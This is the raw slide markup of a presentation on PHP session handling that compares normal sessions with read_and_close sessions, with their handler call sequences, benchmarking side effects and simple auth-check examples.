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005E00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5E00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6" y="1270000"/>
            <a:ext cx="16840170" cy="1124371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7"/>
            <a:ext cx="16773843" cy="1118820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php.net/manual/en/function.session-set-save-handler.php#126563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y Ramesh N Jangid"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396664" y="11556026"/>
            <a:ext cx="21971002" cy="1220156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr b="0"/>
            </a:pPr>
            <a:r>
              <a:t>Ramesh N Jangid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr b="0" sz="2700"/>
            </a:pPr>
            <a:r>
              <a:t>M-Tech ChE IITK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="PHP Microservices Framework"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181095" y="2574991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b="0" spc="-248" sz="9600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PHP Session beyond $_SESSION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153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154" name="Client &amp; Server side"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260490" y="7997682"/>
            <a:ext cx="7137578" cy="1031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300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Client &amp; Server side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02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03" name="Server side…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8375294" y="5042001"/>
            <a:ext cx="7633412" cy="3631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9000">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Session behaviour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Behaviour - Normal sess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Behaviour - Normal session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php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include</a:t>
            </a:r>
            <a:r>
              <a:t> 'session_set_save_handler.php';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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:t> ( )</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response' . PHP_EOL;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207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08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09" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="5052328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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/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 first execution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create_sid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PHP Response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write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close</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17875009" y="3582509"/>
            <a:ext cx="5268304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3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="-7500"/>
                  <a:lumOff val="-10588"/>
                </a:schemeClr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 following executions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PHP Response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write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close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Behaviour - Read-only sess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Behaviour - Read-only session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3562703"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php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include</a:t>
            </a:r>
            <a:r>
              <a:t> 'session_set_save_handler.php';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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( [ </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_and_close</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>]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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response' . PHP_EOL;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214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15" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="5052328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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/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 first execution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create_sid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rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr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PHP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216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17" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17875009" y="3582509"/>
            <a:ext cx="5268304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3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="-7500"/>
                  <a:lumOff val="-10588"/>
                </a:schemeClr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 following executions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close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PHP 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20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21" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="4248503"/>
            <a:ext cx="9891094" cy="665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40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:buSzPct val="123000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>session_start ( )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Open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Create / Validate session id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Read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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PHP Response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b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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Serialise $_SESSION to save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Close</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12597114" y="4248503"/>
            <a:ext cx="9891094" cy="665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40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:buSzPct val="123000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>session_start ( [ '</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_and_close</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>] )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Open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Create / Validate session id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Read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Close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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PHP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Supported HTTP methods by HTML &lt;form&gt; tag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Behaviour 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26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27" name="Server side…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7502499" y="5042001"/>
            <a:ext cx="9379002" cy="3631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9000">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Benchmarking session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Benchmarking - Normal session"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="2385661"/>
            <a:ext cx="21971000" cy="934781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Benchmarking - Normal session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// dashboard.php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include</a:t>
            </a:r>
            <a:r>
              <a:t> 'session_set_save_handler.php';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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:t> ( )</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333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A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pP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if</a:t>
            </a:r>
            <a:r>
              <a:t> ( ! </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_SESSION</a:t>
            </a:r>
            <a:r>
              <a:t>[ 'id' ] ) ) { </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Auth check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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>die( 'Unauthorised' . PHP_EOL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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response' . PHP_EOL;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231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32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33" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="5052328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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No / Invalid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/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create_sid / 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Unauthorised</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>write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close</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17875009" y="3582509"/>
            <a:ext cx="5268304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3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Valid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="-7500"/>
                  <a:lumOff val="-10588"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000" u="sng"/>
            </a:pPr>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000" u="sng"/>
            </a:pPr>
            <a:r>
              <a:t>Output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PHP Response</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>write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close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Benchmarking - Read-only sess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Benchmarking - Read-only session</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// dashboard.php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include</a:t>
            </a:r>
            <a:r>
              <a:t> 'session_set_save_handler.php';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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( [ </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_and_close</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>]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if</a:t>
            </a:r>
            <a:r>
              <a:t> ( ! </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_SESSION</a:t>
            </a:r>
            <a:r>
              <a:t>[ 'id' ] ) ) { </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Auth check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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>die( 'Unauthorised' . PHP_EOL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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response' . PHP_EOL;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238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39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40" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="5052328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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No / Invalid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/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create_sid / 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close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Unauthorised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1" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17875009" y="3582509"/>
            <a:ext cx="5268304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3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Valid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="-7500"/>
                  <a:lumOff val="-10588"/>
                </a:schemeClr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close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PHP Response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Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/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40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:buSzPct val="123000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>session_start ( )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b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Additional - write operation on access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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Normal pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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Authentication required pages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b="1" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Side effect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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rPr b="1"/>
              <a:t>Data files</a:t>
            </a:r>
            <a:r>
              <a:t> / E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>ntries</a:t>
            </a:r>
            <a:r>
              <a:t> created due to write operation during benchmarking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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b="1" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Scope for session attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" algn="l">
              <a:lnSpc>
                <a:spcPct val="40000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4500"/>
              </a:spcBef>
              <a:buSzPct val="123000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( [ </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_and_close</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>] );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b="1" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>No side effects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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Normal pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1499616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Authentication required pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Benchmarking conclusion"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="2385661"/>
            <a:ext cx="21971000" cy="934781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Benchmarking conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245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46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anitising - scope for session attacks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="2385661"/>
            <a:ext cx="21971000" cy="934781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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitising - scope for session attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1206500" y="3575403"/>
            <a:ext cx="10738391" cy="7443722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&lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// dashboard.php</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="A7A7A7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include</a:t>
            </a:r>
            <a:r>
              <a:t> 'session_set_save_handler.php';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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( [ </a:t>
            </a:r>
            <a:r>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read_and_close</a:t>
            </a:r>
            <a:r>
              <a:t>' =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>]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A7A7A7"/>
                </a:solidFill>
              </a:defRPr>
            </a:pP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if</a:t>
            </a:r>
            <a:r>
              <a:t> ( ! </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:t> ( </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_SESSION</a:t>
            </a:r>
            <a:r>
              <a:t>[ 'id' ] ) ) { </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="A7A7A7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Auth check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</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="535353"/>
                </a:solidFill>
              </a:rPr>
              <a:t>die</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="008800"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:t>'Unauthorised' . PHP_EOL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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response 1' . PHP_EOL;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888888"/>
                </a:solidFill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07020"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ( );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echo</a:t>
            </a:r>
            <a:r>
              <a:t> 'PHP Response 2' . PHP_EOL;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250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51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52" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12466898" y="3582509"/>
            <a:ext cx="5052328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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No / Invalid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent5"/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 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create_sid / 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close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Unauthorised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3" name="Body Level One…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17875009" y="3582509"/>
            <a:ext cx="5268304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3">
                    <a:satOff val="-7500"/>
                    <a:lumOff val="-10588"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Valid session id)</a:t>
            </a:r>
            <a:endParaRPr u="none">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:satOff val="-7500"/>
                  <a:lumOff val="-10588"/>
                </a:schemeClr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</a:t>
            </a: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close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PHP Response 1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PHP Response 2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write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close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hank you !"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010081" y="4502799"/>
